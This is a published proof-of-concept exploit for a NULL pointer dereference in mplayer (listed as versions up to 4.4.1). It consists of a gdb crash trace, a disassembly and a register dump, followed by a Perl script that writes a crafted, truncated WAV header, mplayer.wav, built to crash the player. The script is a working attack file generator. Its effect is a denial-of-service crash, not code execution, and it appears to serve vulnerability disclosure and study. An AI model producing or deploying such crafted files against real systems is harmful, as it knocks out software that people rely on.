# Title : mplayer <= 4.4.1 NULL pointer dereference exploit poc
# Published : 2010-03-18
# Author : Pietro Oliva
# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day
# Date: 17/03/2010
# Author: Pietro Oliva
# Software Link:
# Version: <= 4.4.1
# Tested on: ubuntu 9.10 but should work in windows too
# CVE :
#Program received signal SIGSEGV, Segmentation fault.
#0x081176d8 in af_calc_filter_multiplier ()
#(gdb) disas af_calc_filter_multiplier
#Dump of assembler code for function af_calc_filter_multiplier:
#0x081176d0 <af_calc_filter_multiplier+0>: push %ebp
#0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp
#0x081176d3 <af_calc_filter_multiplier+3>: fld1
#0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax
#0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> crash site: eax (the first argument, loaded from 0x8(%ebp)) is NULL and is dereferenced here
#0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi
#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)
#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax
#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax
#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>
#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp
#0x081176eb <af_calc_filter_multiplier+27>: ret
#End of assembler dump.
# REGISTERS:
#eax 0x0 0 ==========> NULL
#ecx 0xfa157a57 -99255721
#edx 0x1fe0 8160
#ebx 0x8509a08 139500040
#esp 0xbfffe2e8 0xbfffe2e8
#ebp 0xbfffe2e8 0xbfffe2e8
#esi 0x7b84000 129515520
#edi 0xf8000 1015808
#eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8>
#eflags 0x10216 [ PF AF IF RF ]
#cs 0x73 115
#ss 0x7b 123
#ds 0x7b 123
#es 0x7b 123
#fs 0x0 0
#gs 0x33 51
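#!/usr/bin/perl
# PoC generator: writes a minimal, truncated RIFF/WAVE header to mplayer.wav.
# The 23-byte payload declares a 16-byte "fmt " chunk but the file ends after
# only 3 bytes of it; that malformed header is the input behind the reported
# NULL pointer dereference (a crash / DoS condition, nothing more).
#
# Note: the backslashes of every "\x.." / "\n" escape were lost in the
# archived copy of this script (it would have written the literal text
# "x52x49..." instead of bytes); they are restored here.
use strict;
use warnings;

print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n";
print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n";
print "[+] creating crafted file mplayer.wav\n";

# Byte layout of the crafted header (little-endian sizes):
my $buffer = "\x52\x49\x46\x46\x1f\x04\x00\x00"   # "RIFF", RIFF chunk size 0x41f
           . "\x57\x41\x56\x45"                   # "WAVE"
           . "\x66\x6d\x74\x20\x10\x00\x00\x00"   # "fmt ", declared length 16
           . "\x01\x00\x1f";                      # format tag 1 (PCM), then EOF

# Lexical filehandle with an explicit error check; the original used a
# bareword handle and ignored a failed open, then never closed the file.
open(my $fh, '>', 'mplayer.wav') or die "[-] cannot create mplayer.wav: $!\n";
binmode($fh);    # raw bytes, so the header is not CRLF-mangled on Windows
print {$fh} $buffer;
close($fh) or die "[-] close failed: $!\n";
print "[+] done!\n";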